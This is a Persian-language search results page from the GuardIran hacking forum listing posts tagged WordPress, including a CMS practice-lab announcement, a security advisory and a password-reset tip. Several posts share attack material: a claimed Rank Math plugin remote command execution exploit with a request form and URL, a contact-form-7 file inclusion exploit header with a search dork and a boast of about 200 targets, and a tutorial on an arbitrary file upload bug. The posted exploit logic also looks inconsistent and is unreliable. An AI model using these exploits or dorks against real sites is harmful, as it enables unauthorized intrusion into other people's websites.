discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'wordpress'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

10 نتیجه پیدا شد

  1. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  2. یه اکسپلوت جدید برای wordpress میزارم براتون [-] Title : Wordpress Plugin Rank Math v1.0.52.1 - Remote Command Execution [-] Author : MR.MSA [-] Vendor : https://wordpress.org/plugins/seo-by-rank-math [-] Category : Webapps [-] Date : 2020-11-10 Vulnerable Page: /ActionScheduler_Abstract_ListTable.php Vulnerable Source: 541: $method $method($_REQUEST['row_id']); 538: $method = 'row_action_' . $_REQUEST['row_action']; requires: 540: if($_REQUEST['nonce'] === wp_create_nonce($_REQUEST['row_action'] . '::' . $_REQUEST['row_id']) && method_exists($this, $method)) 530: ⇓ function process_row_actions() Exploit Code: <html> <form action="http://localhost/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php" method="GET"> <input name="row_id" type="text"> <input type="submit" value="RCE!" > </form> </html> Exploit URL: http://localhost/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php?row_id=ls ********************************************************* * Discovered By MR.MSA * Telegram: @mr_msa7 * Discord: MR.MSA#3736 *********************************************************
  3. با سلام خدمت کاربران و مدیران گارد ایران " پست رو پیشنهاد می کنم تا آخر بخوانید . " در این پست قصد دارم یک افزونه رو به شما معرفی کنم که در خیلی جاها مورد استفاده قرار می گیرد ، افزونه BigBlueButton (برای وردپرس ) که شما می توانید با استفاده از این افزونه، کلاس انلاین ، آموزش های آنلاین و ... برگذار کنید ؛ تقریبا نود درصد از امکانات یک کلاس آنلاین (اسکای روم و...) رو دارد و میزان عملکردش هم میشه گفت متوسطه رو به بالا هست و ترافیک خوبی دارد . بهتون پیشنهاد می کنم . این افزونه رایگان است و فقط کافی در وردپرس عبارت BigBlueButton رو جست و جو کنید و افزونه رو دانلود کنید . استفاده کردن ازش خیلی ساده هست و دو نوع دسترسی دارد : استاد و دانشجو ؛ اگر بخواهم ویژگی هاش رو بگم پست خیلی طولانی میشود خودتون بروید و ببینید . یک نکته در رابطه با ترافیک : چند روز پیش این افزونه رو برای یک دانشگاه گذاشتم که ۳ کلاس تقریبا ۲۰ نفره در یک ساعت داشت برگذار می شد و گزارش دادن که بعضی دانشجویان صفحه برایشان لود نمی شد و با فیلتر شکن وارد شدن این نکته رو گفتم که اگر یک نفر با این مشکل روبرو شد نگران نباشد . "امیدوارم لذت برده باشید و خوشتون اومده باشه ." bigbluebutton.zip
  4. با سلام خدمت دوستان سوالاتی که در رابطه با MSACMS هست رو در اینجا بپرسید . اگر کسی با MSACMS اشنایی ندارد این تاپیک رو تا اخر بخونه :‌
  5. به نام خدا ........حدود ۲۰۰ تارگت روش هست........ # Exploit Title: contact-form-7.4.9.1 wordpress plugin lfi vulnerability # dork:inurl /wp-content/plugins/contact-form-7/ # Date: 29/november/2017 # Exploit Author: guardiransecurityteam_host.net # Vendor Homepage: wordpress.org # Software Link: wordpress.org/plugins/contact-form-7 # Version: 7.4.9.1 # Tested on: Black Arch Linux # CVE : N/A
  6. سلام دوستان عزیز یک مجموعه آموزش کامل طراحی وبسایت از آقای میلاد عباسی ! اول به صورت کامل HTML رو آموزش میده سپس میره سراغ طراحی قالب WordPress هر روز یک جلسه قرار خواهد گرفت و پسورد تمامی فایل ها guardiran.org خواهد بود ! لطفا به هیچ وجه پست ندید ! یا حـ ـق ../
  7. سلام. یه آموزشی تصویری تهیه کردم در خصوص استفاده از باگ افزونه ی Dreamwork gallery توی وردپرس که میشه باهاش فایل مدنظر رو توی سایت آپلود کرد. رمز فایل : guardiran.org موفق باشید 1-Wordpress - arbitrary file upload - GuardIran.part1.rar 1-Wordpress - arbitrary file upload - GuardIran.part3.rar 1-Wordpress - arbitrary file upload - GuardIran.part2.rar
  8. اگر وبسایت وردپرس دارید حتما به نسخه 4.8.3 بروزرسانیش کنید. Severity Medium Patch available YES Number of vulnerabilities 1 CVSSv2 5 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C) CVSSv3 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C] CVE ID N/A CWE ID CWE-89 Exploitation vector Network Public exploit Not available Vulnerable software WordPress Vulnerable software versions WordPress 4.8.2 WordPress 4.8.1 WordPress 4.8 Show more Vendor URL WordPress.ORG Advisory type Public Security Advisory 1) SQL injection Description The vulnerability allows a remote attacker to execute arbitrary SQL commands in application's database. The vulnerability exists due to an error in $wpdb->prepare() that can lead to SQL injection attacks exploited via third-party software. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary SQL commands in web application database. Remediation Update to version 4.8.3. External links https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
  9. به نام خدا با سلام خدمت دوستان در تاپیک جامع امنیت وردپرس در خدمت شما عزیزان هستم. شما دوستان با رعایت نکات امنیتی ای که گفته می شود احتمال هک شدن سایت خود را به 5 درصد برسانید !! (امنیت هیچ گاه 100 درصد نیست) اموزشات به صورت متن هستش و فیلمی قرار نمیگیره. سوالات خود را در بخش زیر مطرح کنید و تحت هر شرایطی اسپم ندید: http://guardiran.org/forums/forum/19-%D8%B3%D9%88%D8%A7%D9%84-%D9%88-%D8%AC%D9%88%D8%A7%D8%A8-%D9%87%D8%A7%DB%8C-%D9%86%D9%81%D9%88%D8%B0-%D8%A8%D9%87-%D8%B3%D8%A7%DB%8C%D8%AA-%D9%87%D8%A7-%D9%88-%D8%B3%D8%B1%D9%88%D8%B1%D9%87%D8%A7-%D9%88-%D8%B1%D9%88%D8%B4%D9%87%D8%A7%DB%8C-%D9%85/ در صورت رضایت تشکر فراموش نشود موفق باشید
  10. درود از طریق FTP وارد سرور شوید. ../wp-content/themes/وارد نام قالبی که استفاده شده بروید فایل functions.php را دانلود کنید. فایل functions.php را باز کنید و بعد از کد <?php کد زیر را اضافه کنید: wp_set_password(‘New_Passwd’,1); عدد ۱ شماره User ID مدیر کل است. بجای New_Passwd یسورد مورد نظرتون و بزارید. فایل functions.php ویرایش شده را از FTP آپلود کنید. پایان